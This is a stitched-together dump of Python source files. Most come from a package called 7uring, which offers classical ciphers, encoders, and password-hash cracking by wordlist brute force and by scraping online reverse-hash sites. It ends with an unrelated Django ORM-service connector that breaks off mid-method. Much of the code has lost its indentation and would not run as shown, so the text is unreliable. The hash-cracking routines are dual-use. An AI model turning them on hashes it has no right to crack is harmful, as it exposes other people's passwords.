sha512Brute(data, wordlist)
elif argv[2].lower() == '--whirlpool':
if argv[3] == '--enc':
print(colors['success'] + stringToWhirlpool(data))
elif argv[3] == '--dec':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for hashes. Use --rainbow or --brute instead.')
sys.exit()
elif argv[3] == '--rainbow':
whirlpoolToString(data)
else:
whirlpoolBrute(data, wordlist)
elif argv[1].lower() == 'cipher':
if argv[2].lower() not in ciphers:
print(colors['error'] + 'Unrecognized cipher type.')
sys.exit()
elif argv[3].lower() not in options:
print(colors['error'] + 'Unrecognized option ' + '\'' + argv[3] + '\'')
sys.exit()
elif argv[2].lower() == '--bacon':
if argv[3] == '--enc':
baconEncrypt(data)
elif argv[3] == '--dec':
baconDecrypt(data)
elif argv[3] == '--rainbow':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for ciphers. Use --enc or --dec instead.')
sys.exit()
else:
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for ciphers (except caesar). Use --enc or --dec instead.')
sys.exit()
elif argv[2].lower() == '--caesar':
if argv[3] == '--enc':
shift = int(input(colors['msg'] + 'Enter shift value: '))
caesarEncrypt(data, shift)
elif argv[3] == '--dec':
shift = int(input(colors['msg'] + 'Enter shift value: '))
caesarDecrypt(data, shift)
elif argv[3] == '--rainbow':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for ciphers. Use --enc or --dec instead.')
sys.exit()
else:
caesarBrute(data)
sys.exit()
elif argv[2].lower() == '--monoalphabetic':
if argv[3] == '--enc':
monoalphabeticEncrypt(data)
elif argv[3] == '--dec':
monoalphabeticDecrypt(data)
elif argv[3] == '--rainbow':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for ciphers. Use --enc or --dec instead.')
sys.exit()
else:
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for ciphers (except caesar). Use --enc or --dec instead.')
sys.exit()
elif argv[2].lower() == '--morse':
if argv[3] == '--enc':
morseEncrypt(data)
elif argv[3] == '--dec':
morseDecrypt(data)
elif argv[3] == '--rainbow':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for ciphers. Use --enc or --dec instead.')
sys.exit()
else:
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for ciphers (except caesar). Use --enc or --dec instead.')
sys.exit()
elif argv[2].lower() == '--multitapsms':
if argv[3] == '--enc':
multitapEncrypt(data)
elif argv[3] == '--dec':
multitapDecrypt(data)
elif argv[3] == '--rainbow':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for ciphers. Use --enc or --dec instead.')
sys.exit()
else:
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for ciphers (except caesar). Use --enc or --dec instead.')
sys.exit()
elif argv[2].lower() == '--rot13':
if argv[3] == '--enc':
rot13Encrypt(data)
elif argv[3] == '--dec':
rot13Decrypt(data)
elif argv[3] == '--rainbow':
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for ciphers. Use --enc or --dec instead.')
            sys.exit()
        else:
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for ciphers (except Caesar). Use --enc or --dec instead.')
sys.exit()
elif argv[2].lower() == '--rot47':
if argv[3] == '--enc':
rot47Encrypt(data)
elif argv[3] == '--dec':
rot47Decrypt(data)
elif argv[3] == '--rainbow':
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for ciphers. Use --enc or --dec instead.')
            sys.exit()
        else:
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for ciphers (except Caesar). Use --enc or --dec instead.')
sys.exit()
elif argv[2].lower() == '--transposition':
if argv[3] == '--enc':
key = input(colors['msg'] + 'Enter key value: ')
transpositionEncrypt(data, key)
elif argv[3] == '--dec':
key = input(colors['msg'] + 'Enter key value: ')
transpositionDecrypt(data, key)
elif argv[3] == '--rainbow':
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for ciphers. Use --enc or --dec instead.')
            sys.exit()
        else:
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for ciphers (except Caesar). Use --enc or --dec instead.')
sys.exit()
elif argv[1].lower() == 'encoder':
if argv[2].lower() not in encoders:
print(colors['error'] + 'Unrecognized encoding type.')
sys.exit()
elif argv[3].lower() not in options:
print(colors['error'] + 'Unrecognized option ' + '\'' + argv[3] + '\'')
sys.exit()
elif argv[2].lower() == '--binary':
if argv[3] == '--enc':
binaryEncode(data)
elif argv[3] == '--dec':
binaryDecode(data)
elif argv[3] == '--rainbow':
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for encoders. Use --enc or --dec instead.')
            sys.exit()
        else:
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for encoders. Use --enc or --dec instead.')
sys.exit()
elif argv[2].lower() == '--octal':
if argv[3] == '--enc':
octalEncode(data)
elif argv[3] == '--dec':
octalDecode(data)
elif argv[3] == '--rainbow':
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for encoders. Use --enc or --dec instead.')
            sys.exit()
        else:
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for encoders. Use --enc or --dec instead.')
sys.exit()
elif argv[2].lower() == '--hexadecimal':
if argv[3] == '--enc':
hexadecimalEncode(data)
elif argv[3] == '--dec':
hexadecimalDecode(data)
elif argv[3] == '--rainbow':
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for encoders. Use --enc or --dec instead.')
            sys.exit()
        else:
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for encoders. Use --enc or --dec instead.')
sys.exit()
elif argv[2].lower() == '--base64':
if argv[3] == '--enc':
base64Encode(data)
elif argv[3] == '--dec':
base64Decode(data)
elif argv[3] == '--rainbow':
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for encoders. Use --enc or --dec instead.')
            sys.exit()
        else:
            print(colors['error'] + '\'' + argv[3] + '\'' +
                ', this option is not for encoders. Use --enc or --dec instead.')
            sys.exit()

# ---- end of file: turing/programfiles/cliProcess.py (package: 7uring) ----
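# Illustrative invocation sketch (added note, not part of the original source):
# the dispatch above assumes argv[1] picks the mode ('hash', 'cipher' or
# 'encoder'), argv[2] the algorithm flag and argv[3] the action, with `data`
# and `wordlist` collected earlier in the script. For example:
#
#     python cliProcess.py cipher --caesar --enc     # prompts for a shift value
#     python cliProcess.py hash --sha512 --brute     # brute-forces using the wordlist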
import sys, enchant
small = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def caesarEncrypt(text, shift):
res = ''
    if shift < 0 or shift > 25:
        print(colors['error'] + 'Shift value should be 0-25') #Shift value check
        sys.exit() #Stop instead of shifting with an out-of-range value
for i in range(len(text)):
if text[i].isupper():
ind = small.index(text[i].lower()) #Find the index of character
res += small[(ind + shift)%26].upper() #Shift the character
elif text[i].islower():
ind = small.index(text[i]) #Find the index of character
res += small[(ind + shift)%26] #Shift the character
elif text[i] == ' ':
res += ' '
else:
print(colors['error'] + 'Invalid characters!') #Check for invalid characters
sys.exit()
print(colors['success'] + res)
def caesarDecrypt(text, shift):
res = ''
    if shift < 0 or shift > 25:
        print(colors['error'] + 'Shift value should be 0-25') #Shift value check
        sys.exit() #Stop instead of indexing with an out-of-range shift
for i in range(len(text)):
if text[i].isupper():
ind = small.index(text[i].lower()) #Find the index of character
res += small[ind - shift].upper() #Shift the character
elif text[i].islower():
ind = small.index(text[i]) #Find the index of character
res += small[ind - shift] #Shift the character
elif text[i] == ' ':
res += ' '
else:
print(colors['error'] + 'Invalid characters!') #Check for invalid characters
sys.exit()
print(colors['success'] + res)
def caesarBrute(text):
possible = set()
for shift in range(26):
res = ''
for i in range(len(text)):
if text[i].isupper():
ind = small.index(text[i].lower()) #Find the index of character
res += small[ind - shift].upper() #Shift the character
elif text[i].islower():
ind = small.index(text[i]) #Find the index of character
res += small[ind - shift] #Shift the character
elif text[i] == ' ':
res += ' '
else:
print(colors['error'] + 'Invalid characters!') #Check for invalid characters
sys.exit()
print(colors['success'] + 'shift(' + "{:02d}".format(shift) +
')' + ' : ' + res)
dic = enchant.Dict('en_US') #Create a US english Dictionary
for j in res.split():
if len(j) > 2 and dic.check(j): #Check for english words
possible.add('shift(' + "{:02d}".format(shift) +
')' + ' : ' + res)
if len(possible) > 0:
print(colors['success'][:-4] + '\nMost possible solutions:') #Print most possible solutions
for k in possible:
            print(colors['success'] + k)

# ---- end of file: turing/cipher/caesar.py (package: 7uring) ----
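# Illustrative usage sketch (added for clarity, not part of the original module):
#
#     caesarEncrypt('Attack at dawn', 3)   # prints: Dwwdfn dw gdzq
#     caesarDecrypt('Dwwdfn dw gdzq', 3)   # prints: Attack at dawn
#     caesarBrute('Dwwdfn dw gdzq')        # tries all 26 shifts and flags the
#                                          # shifts that yield English words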
import hashlib, requests, bs4, re, os, sys
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def stringToMD5(string):
result = hashlib.md5(string.encode()) #Create an MD5 hash object
return result.hexdigest() #Return the required hexadecimal hash
def verifyMD5(md5):
md5Regex = re.compile(r'^[0-9a-f]{32}$') #Create a regex object
mo = md5Regex.search(md5.lower()) #Create a match object
if mo == None:
return False
else:
return True
def md5ToString(md5):
if not verifyMD5(md5):
print(colors['error'] + 'Invalid hash')
sys.exit()
else:
url = 'https://md5.gromweb.com/?md5=' + md5 #Create a url
res = requests.get(url) #Query the url
res.raise_for_status()
source = res.content
soup = bs4.BeautifulSoup(source, 'lxml') #Create a beautiful soup object
css_path = 'html body div#page.p-1.p-3-lg div#container section#section article div#content p em.long-content.string'
elem = soup.select(css_path) #Find the required element
try:
print(colors['msg'] + 'Cracked!' + '\n' + colors['success'] + md5 + ':' + elem[0].text) #Print the cracked string
        except IndexError: #No matching element means the hash was not cracked
print(colors['msg'] + 'Hash not found in databases')
def md5Brute(md5, wordlist):
md5 = md5.lower()
if os.path.exists(wordlist) and os.path.isfile(wordlist): #Check if the wordlist exists and if it is a file
if not os.path.isabs(wordlist): #Check if it is an absolute path
wordlist = os.path.abspath(wordlist)
else:
print(colors['error'] + 'Invalid path') #Exit program if invalid path
sys.exit()
if not verifyMD5(md5): #Verify if hash is correct
print(colors['error'] + 'Invalid hash')
sys.exit()
with open(wordlist, 'r', errors='replace') as w:
words = w.readlines() #Store all lines in a list
for word in words:
md5String = stringToMD5(word.rstrip())
if md5String == md5: #Check if hash matches
print(colors['msg'] + 'Cracked!')
print(colors['success'] + md5 + ":" + word)
break
else:
print(colors['msg'] + "Not found") | 7uring | /7uring-1.0.0.tar.gz/7uring-1.0.0/turing/hashing/hashmd5.py | hashmd5.py |
import hashlib, requests, bs4, re, os, sys
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def stringToSHA1(string):
result = hashlib.sha1(string.encode()) #Create a SHA1 hash object
return result.hexdigest() #Return the required hexadecimal hash
def verifySHA1(sha1):
sha1Regex = re.compile(r'^[a-f0-9]{40}$') #SHA-1 regex object
mo = sha1Regex.search(sha1.lower()) #Create a match object
if mo == None:
return False
else:
return True
def sha1ToString(sha1):
if not verifySHA1(sha1):
print(colors['error'] + 'Invalid hash')
sys.exit()
else:
url = 'https://sha1.gromweb.com/?hash=' + sha1 #Create url for scraping
res = requests.get(url) #Query the url
res.raise_for_status()
source = res.content
soup = bs4.BeautifulSoup(source, 'lxml') #Create a beautiful soup object
css_path = 'html body div#page.p-1.p-3-lg div#container section#section article div#content p em.long-content.string'
elem = soup.select(css_path)
try:
print(colors['msg'] + 'Cracked!\n' + colors['success'] + sha1 + ':' + elem[0].text) #Print the cracked string
        except IndexError: #No matching element means the hash was not cracked
print(colors['msg'] + 'Hash not found in databases')
def sha1Brute(sha1, wordlist):
sha1 = sha1.lower()
if os.path.exists(wordlist) and os.path.isfile(wordlist): #Check if the wordlist exists and if it is a file
if not os.path.isabs(wordlist): #Check if it is an absolute path
wordlist = os.path.abspath(wordlist)
else:
print(colors['error'] + 'Invalid path')
sys.exit()
if not verifySHA1(sha1): #Verify if hash is correct
print(colors['error'] + 'Invalid hash')
sys.exit()
with open(wordlist, 'r', errors='replace') as w:
words = w.readlines() #Store all words in a list
for word in words:
sha1String = stringToSHA1(word.rstrip())
if sha1String == sha1: #Check if hash matches
print(colors['msg'] + 'Cracked!')
print(colors['success'] + sha1 + ':' + word)
break
else:
            print(colors['msg'] + 'Not found')

# ---- end of file: turing/hashing/hashsha1.py (package: 7uring) ----
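# Illustrative usage sketch (added for clarity, not part of the original module):
#
#     stringToSHA1('password')  # -> '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'
#     sha1ToString('5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8')  # scrapes sha1.gromweb.com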
import hashlib, requests, bs4, re, os, sys
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def stringToSHA384(string):
result = hashlib.sha384(string.encode()) #Create a SHA384 object
return result.hexdigest() #Return the required hexadecimal hash
def verifySHA384(sha384):
sha384Regex = re.compile(r'^[0-9a-f]{96}$') #Create a regex object
mo = sha384Regex.search(sha384.lower()) #Create a match object
if mo == None:
return False
else:
return True
def sha384ToString(sha384):
sha384 = sha384.lower()
if not verifySHA384(sha384):
print(colors['error'] + 'Invalid hash')
sys.exit()
else:
URL = 'https://md5decrypt.net/en/Sha384/' #Create a url
myobj = {
'hash':sha384,
'captcha65684':'',
'ahah65684':'30beb54b674b10bf73888fda4d38893f',
'decrypt':'Decrypt'
}
res = requests.post(url=URL, data=myobj) #Send a POST request
res.raise_for_status()
source = res.content
soup = bs4.BeautifulSoup(source, 'lxml') #Create a beautiful soup object
css_path = 'html body div#corps fieldset#answer b'
elem = soup.select(css_path) #Find the required element
try:
print(colors['msg'] + 'Cracked!\n' + colors['success'] + sha384 + ':' + elem[0].text) #Print the cracked string
        except IndexError: #No matching element means the hash was not cracked
print(colors['msg'] + 'Hash not found in databases')
def sha384Brute(sha384, wordlist):
    sha384 = sha384.lower() #Normalize case so comparison with hexdigest succeeds
    if os.path.exists(wordlist) and os.path.isfile(wordlist): #Check if the wordlist exists and if it is a file
if not os.path.isabs(wordlist): #Check if it is an absolute path
wordlist = os.path.abspath(wordlist)
else:
print(colors['error'] + 'Invalid path') #Exit program if invalid path
sys.exit()
if not verifySHA384(sha384): #Verify if hash is correct
print(colors['error'] + 'Invalid hash')
sys.exit()
with open(wordlist, 'r', errors='replace') as w:
words = w.readlines() #Store all lines in a list
for word in words:
sha384String = stringToSHA384(word.rstrip())
if sha384String == sha384: #Check if hash matches
print(colors['msg'] + 'Cracked!')
print(colors['success'] + sha384 + ':' + word)
break
else:
            print(colors['msg'] + 'Not found')

# ---- end of file: turing/hashing/hashsha384.py (package: 7uring) ----
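# Illustrative usage sketch (added for clarity, not part of the original module).
# Unlike the gromweb scrapers above, this module submits a POST form to md5decrypt.net:
#
#     digest = stringToSHA384('password')   # 96 hex characters
#     verifySHA384(digest)                  # -> True
#     sha384Brute(digest, 'wordlist.txt')   # wordlist path is an example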
import os, hashlib, requests, bs4, re, sys
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def stringToSHA256(string):
result = hashlib.sha256(string.encode()) #Create a SHA256 hash object
return result.hexdigest() #Return the required hexadecimal hash
def verifySHA256(sha256):
sha256Regex = re.compile(r'^[0-9a-f]{64}$') #Create a regex object
mo = sha256Regex.search(sha256.lower()) #Create a match object
if mo == None:
return False
else:
return True
def sha256ToString(sha256):
if not verifySHA256(sha256):
print(colors['error'] + 'Invalid hash')
sys.exit()
else:
URL = 'https://md5decrypt.net/en/Sha256/' #Create a url
myobj = {
'hash':sha256,
'captcha65684':'',
'ahah65684':'30beb54b674b10bf73888fda4d38893f',
'decrypt':'Decrypt'
}
res = requests.post(url=URL, data=myobj) #Send a POST request
res.raise_for_status()
source = res.content
soup = bs4.BeautifulSoup(source, 'lxml') #Create a beautiful soup object
css_path = 'html body div#corps fieldset#answer b'
elem = soup.select(css_path) #Find the required element
try:
print(colors['msg'] + 'Cracked!\n' + colors['success'] + sha256 + ':' + elem[0].text) #Print the cracked string
        except IndexError: #No matching element means the hash was not cracked
print(colors['msg'] + 'Hash not found in databases')
def sha256Brute(sha256, wordlist):
sha256 = sha256.lower()
if os.path.exists(wordlist) and os.path.isfile(wordlist): #Check if the wordlist exists
if not os.path.isabs(wordlist): #Check if it is an absolute path
wordlist = os.path.abspath(wordlist)
else:
print(colors['error'] + 'Invalid path')
sys.exit()
if not verifySHA256(sha256): #Verify if hash is correct
print(colors['error'] + 'Invalid hash')
sys.exit()
with open(wordlist, 'r', errors='replace') as w:
words = w.readlines() #Store all words in a list
for word in words:
sha256String = stringToSHA256(word.rstrip())
if sha256String == sha256: #Check if hash matches
print(colors['msg'] + 'Cracked!')
print(colors['success'] + sha256 + ':' + word)
break
else:
            print(colors['msg'] + 'Not found')

# ---- end of file: turing/hashing/hashsha256.py (package: 7uring) ----
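# Illustrative usage sketch (added for clarity, not part of the original module):
#
#     stringToSHA256('password')
#     # -> '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8'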
import hashlib, re, sys, requests, bs4, os
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def stringToMD4(string):
result = hashlib.new('md4',string.encode('utf-8')) #Create an MD4 hash object
return result.hexdigest() #Return the required hexadecimal hash
def verifyMD4(md4):
md4Regex = re.compile(r'^[0-9a-f]{32}$') #Create a regex object
mo = md4Regex.search(md4.lower()) #Create a match object
if mo == None:
return False
else:
return True
def md4ToString(md4):
if not verifyMD4(md4):
print(colors['error'] + 'Invalid hash')
sys.exit()
else:
URL = 'https://md5decrypt.net/en/Md4/' #Create a url
myobj = {
'hash':md4,
'captcha65':'',
'ahah65':'ea1f3b6fdf11511d0a4fa2ae757132db',
'decrypt':'Decrypt'
}
res = requests.post(url=URL, data=myobj) #Send a POST request
res.raise_for_status()
source = res.content
soup = bs4.BeautifulSoup(source, 'lxml') #Create a beautiful soup object
css_path = 'html body div#corps fieldset#answer b'
elem = soup.select(css_path) #Find the required element
try:
print(colors['msg'] + 'Cracked!' + '\n' + colors['success'] + md4 + ':' + elem[0].text) #Print the cracked string
        except IndexError: #No matching element means the hash was not cracked
print(colors['msg'] + 'Hash not found in databases')
def md4Brute(md4, wordlist):
md4 = md4.lower()
if os.path.exists(wordlist) and os.path.isfile(wordlist): #Check if the wordlist exists and if it is a file
if not os.path.isabs(wordlist): #Check if it is an absolute path
wordlist = os.path.abspath(wordlist)
else:
print(colors['error'] + 'Invalid path') #Exit program if invalid path
sys.exit()
if not verifyMD4(md4): #Verify if hash is correct
print(colors['error'] + 'Invalid hash')
sys.exit()
with open(wordlist, 'r', errors='replace') as w:
words = w.readlines() #Store all lines in a list
for word in words:
md4String = stringToMD4(word.rstrip())
if md4String == md4: #Check if hash matches
print(colors['msg'] + 'Cracked!')
print(colors['success'] + md4 + ":" + word)
break
else:
print(colors['msg'] + "Not found") | 7uring | /7uring-1.0.0.tar.gz/7uring-1.0.0/turing/hashing/hashmd4.py | hashmd4.py |
import hashlib, requests, bs4, re, os, sys
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def stringToSHA512(string):
result = hashlib.sha512(string.encode()) #Create a SHA512 hash object
return result.hexdigest() #Return the required hexadecimal hash
def verifySHA512(sha512):
sha512Regex = re.compile(r'^[0-9a-f]{128}$') #Create a regex object
    mo = sha512Regex.search(sha512.lower()) #Create a match object
if mo == None:
return False
else:
return True
def sha512ToString(sha512):
sha512 = sha512.lower()
if not verifySHA512(sha512):
print(colors['error'] + 'Invalid hash')
sys.exit()
else:
URL='https://md5decrypt.net/en/Sha512/' #Create a url
myobj = {
'hash':sha512,
'captcha13126':'',
'ahah13126':'8239e6d5b8e2f67f34cfbd3c77b05523',
'decrypt':'Decrypt'
}
res = requests.post(url=URL, data=myobj) #Send a POST request
res.raise_for_status()
source = res.content
        soup = bs4.BeautifulSoup(source, 'lxml') #Create a beautiful soup object
css_path = 'html body div#corps fieldset#answer b'
elem = soup.select(css_path) #Find the required element
try:
print(colors['msg'] + 'Cracked!\n' + colors['success'] + sha512 + ':' + elem[0].text) #Print the cracked string
        except IndexError: #No matching element means the hash was not cracked
print(colors['msg'] + 'Hash not found in databases')
def sha512Brute(sha512, wordlist):
    sha512 = sha512.lower() #Normalize case so comparison with hexdigest succeeds
    if os.path.exists(wordlist) and os.path.isfile(wordlist): #Check if the wordlist exists
if not os.path.isabs(wordlist): #Check if it is an absolute path
wordlist = os.path.abspath(wordlist)
else:
print(colors['error'] + 'Invalid path')
sys.exit()
if not verifySHA512(sha512): #Verify if hash is correct
print(colors['error'] + 'Invalid hash')
sys.exit()
with open(wordlist, 'r', errors='replace') as w:
words = w.readlines() #Store all words in a list
for word in words:
sha512String = stringToSHA512(word.rstrip())
if sha512String == sha512: #Check if hash matches
print(colors['msg'] + 'Cracked!')
print(colors['success'] + sha512 + ':' + word)
break
else:
            print(colors['msg'] + 'Not found')

# ---- end of file: turing/hashing/hashsha512.py (package: 7uring) ----
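# Illustrative usage sketch (added for clarity, not part of the original module):
#
#     digest = stringToSHA512('password')   # 128 hex characters
#     sha512Brute(digest, 'wordlist.txt')   # wordlist path is an example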
__author__ = "Rimba Prayoga"
__copyright__ = "Copyright 2019, 88Spares"
__credits__ = ["88 Tech"]
__maintainer__ = "Rimba Prayoga"
__email__ = "[email protected]"
__status__ = "Development"
import json
from typing import List
from urllib.parse import urljoin
import requests
from django.conf import settings
from django.db import models
from django.db.models import Q, ObjectDoesNotExist
from django.utils.functional import cached_property
from .models import initialize_models, get_model, VirtualModel
initialize_models()
service_settings = getattr(settings, 'ORM_SERVICE', {
"url": "",
"auth_header": ""
})
ORM_SERVICE_URL = service_settings.get("url")
ORM_SERVICE_AUTH_HEADER = service_settings.get("auth_header")
class ORMServices(object):
"""
    ORM Services Connector.
    Because you are already familiar with the Django ORM,
    you can use it like the Django ORM :D
"""
def __init__(self, model: str, fields=None, **kwargs):
initialize_models()
app_label = None
if len(model.split('.')) == 2:
app_label, model = model.split('.')
if isinstance(model, str):
self._model_name = model
elif isinstance(model, type) and isinstance(model(), models.Model):
self._model_name = model._meta.model_name.lower()
else:
raise TypeError('unsupported type "%s" for model.' % type(model))
self._app_label = app_label
self._payload = {}
if fields is None:
fields = ['__all__']
self._fields = fields
self._exclude_fields = kwargs.get('exclude_fields', None)
self._result_cache = {}
self._CHUNK_SIZE = 20
self.model_info = get_model(model, app_label)
########################
# PYTHON MAGIC METHODS #
########################
def __repr__(self):
if self._payload:
_slice = self._payload.get('slice')
if _slice:
start = _slice.get('start')
stop = _slice.get('stop')
step = _slice.get('step')
data = list(self[start:stop:step])
else:
data = list(self[:self._CHUNK_SIZE])
if len(data) >= self._CHUNK_SIZE:
data[-1] = '...(remaining elements truncated)...'
return f"<Virtual Queryset {data}>"
return super(ORMServices, self).__repr__()
def __iter__(self):
data = self._result_cache.get('result')
if not self._payload:
data = []
if data is None:
self.__bind()
data = self._result_cache.get('result')
return iter(data)
def __len__(self):
count = self._result_cache.get("count", 0)
if not count and self.__last_query:
self.__bind()
count = self._result_cache.get("count", 0)
return count
def __bool__(self):
return bool(len(self))
def __getitem__(self, item):
result_cache = self._result_cache.get('result')
if result_cache:
return result_cache[item]
if isinstance(item, slice):
clone = self._clone()
clone._payload.update({
"slice": {
"start": item.start,
"stop": item.stop,
"step": item.step
}
})
return clone
_self = self.__bind()
if _self == self:
result_cache = self._result_cache.get('result')
return result_cache[item]
return _self
@cached_property
def __exclude_params(self):
return [
"all",
"exists",
"count",
"first",
"last",
"latest",
"values",
"save",
"distinct"
]
@cached_property
def __is_model_instance(self):
for method in ["first", "last", "latest"]:
if self._payload.get(method):
return True
return False
@property
def __payload_request(self):
payload = {
"model": self._model_name,
"payload": self._payload,
"fields": self._fields,
"exclude_fields": self._exclude_fields
}
if self._app_label:
payload.update({
"app_label": self._app_label
})
return payload
@property
def __last_query(self) -> str:
"""
:return: last query
"""
queries = list(self._payload.keys()).copy()
if 'slice' in queries:
queries.pop(queries.index('slice'))
try:
return queries[-1]
except IndexError:
return ''
@property
def __is_return_different_object(self) -> bool:
return self.__last_query in [
'first', 'last', 'get', 'latest',
'exists', 'count', 'create'
]
@property
def __is_return_instance(self) -> bool:
return self.__last_query in ['first', 'last', 'get', 'latest', 'create']
    def __update_payload(self, name, data) -> None:
        try:
            existed = self._payload.get(name).copy()  # type: dict
        except AttributeError:
            pass
        else:
            existed.update({
                "args": [*existed.get("args", []), *data.get("args", [])],
                "kwargs": {
                    **existed.get("kwargs", {}),
                    **data.get("kwargs", {})
                }
            })
            data = existed
        self._payload.update({
            name: data
        })
# --- expressions
def __resolve_q(self, args: Q) -> List:
"""
Resolve expression Q. e.g: Q(a=b) | Q(c=d).
        :param args: the Q expression to serialize
        :return: a JSON-serializable ['Q', params, connector] list
"""
_, params, connector = args.deconstruct()
params = list(params)
for index, param in enumerate(params.copy()):
if isinstance(param, Q):
params[index] = self.__resolve_q(param)
elif isinstance(param, tuple):
params[index] = list(param)
return ['Q', params, connector]
def __resolve_expression(self, expr):
expression_handlers = {
"Q": self.__resolve_q
}
return expression_handlers.get(expr)
def __do_query(self, name, *args, **kwargs):
assert self._payload.get('slice') is None, \
"Cannot filter a query once a slice has been taken."
_args = list(args).copy()
for index, arg in enumerate(_args):
if isinstance(arg, Q):
_args[index] = self.__resolve_q(arg)
clone = self._clone()
payload = {
"args": _args,
"kwargs": kwargs
}
clone.__update_payload(name, data=payload)
if clone.__is_return_different_object:
if clone.__is_return_instance:
return clone.__bind()
return clone.fetch()
return clone
def _clone(self):
"""
:return: clone of current class
"""
exclude_fields = self._exclude_fields
if isinstance(exclude_fields, (dict, list)):
exclude_fields = self._exclude_fields.copy()
model_name = self._model_name
if self._app_label:
model_name = f'{self._app_label}.{model_name}'
clone = self.__class__(
model_name,
self._fields.copy(),
exclude_fields=exclude_fields
)
clone._payload = self._payload.copy()
return clone
def __clear_query(self, name=None):
if name is not None:
try:
del self._payload[name]
except KeyError:
pass
else:
self._payload = {}
def __bind(self, model=None, data=None, with_relation=False):
if data is None:
data = self.fetch()
if isinstance(data, dict):
_model = model
if _model is None:
_model = self._model_name
vi = VirtualModel(
model=_model,
payload=self.__payload_request,
value=data,
model_info=self.model_info
)
return vi
vi = {
"result": [],
"count": 0
}
if isinstance(data, list):
if {'values', 'values_list'} & set(self._payload.keys()):
vi.update({
"result": data,
"count": len(data)
})
else:
for i in data:
_vi = VirtualModel(
model=self._model_name,
payload=self.__payload_request,
value=i,
model_info=self.model_info
)
vi.get('result').append(_vi)
vi.update({
"count": vi.get("count") + 1
})
self._result_cache = vi
return self
def __bind_with_relation(self, relation_data):
data = self.fetch_with_relation(relation_data)
return self.__bind(data=data, with_relation=True)
# for custom method
def call_manager_method(self, name, *args, **kwargs):
return self.__do_query(name, *args, **kwargs)
# --- fetch data from orm services
def __request_get(self, url, payload, params=None):
response = requests.get(url, data=json.dumps(payload), headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
}, params=params)
if response.status_code == 400:
raise Exception(response.text)
elif response.status_code == 404:
raise ObjectDoesNotExist(
"%s matching query does not exist." % self._model_name.capitalize())
try:
return response.json()
except json.decoder.JSONDecodeError:
if response.text:
raise Exception(response.text)
def __request_post(self, url, payload):
response = requests.post(url, data=json.dumps(payload), headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
})
try:
return response.json()
except json.decoder.JSONDecodeError:
raise Exception(response.text)
def fetch(self):
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_queryset")
return self.__request_get(
url=url,
payload=self.__payload_request
)
def fetch_with_relation(self, relation_data):
"""
fetch data with relation object
:param relation_data: -- e.g:
ORMServices(model='partitem').all()
.fetch_with_relation({'member':[{'user': ['id', 'email']}]})
:return: -- response:
[{'member': {'user': {'id': 556, 'email': '[email protected]'}}},]
"""
payload = self.__payload_request.copy()
payload.update({
"relation_data": relation_data
})
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_queryset")
return self.__request_get(
url=url,
payload=payload
)
def get_property(self, property_name):
payload = self.__payload_request.copy()
payload.update({
"property_name": property_name
})
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_property")
return self.__request_get(url=url, payload=payload)
def call_property(self, property_name):
payload = self.__payload_request.copy()
payload.update({
"property_name": property_name
})
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/call_property")
return self.__request_get(url=url, payload=payload)
# --- querying
def get_queryset(self, *args, **kwargs):
return self.__do_query('all', *args, **kwargs)
def all(self):
return self.get_queryset()
def exists(self) -> bool:
return self.__do_query('exists')
def get(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('get', *args, **kwargs)
def filter(self, *args, **kwargs):
return self.__do_query('filter', *args, **kwargs)
def exclude(self, *args, **kwargs):
return self.__do_query('exclude', *args, **kwargs)
def values(self, *args, **kwargs):
return self.__do_query('values', *args, **kwargs)
def values_list(self, *args, **kwargs):
return self.__do_query('values_list', *args, **kwargs)
def count(self, *args, **kwargs) -> int:
